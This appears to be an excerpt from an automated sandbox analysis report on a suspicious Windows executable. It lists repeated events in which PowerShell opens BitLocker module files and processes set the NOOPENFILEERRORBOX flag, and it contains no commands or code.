Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
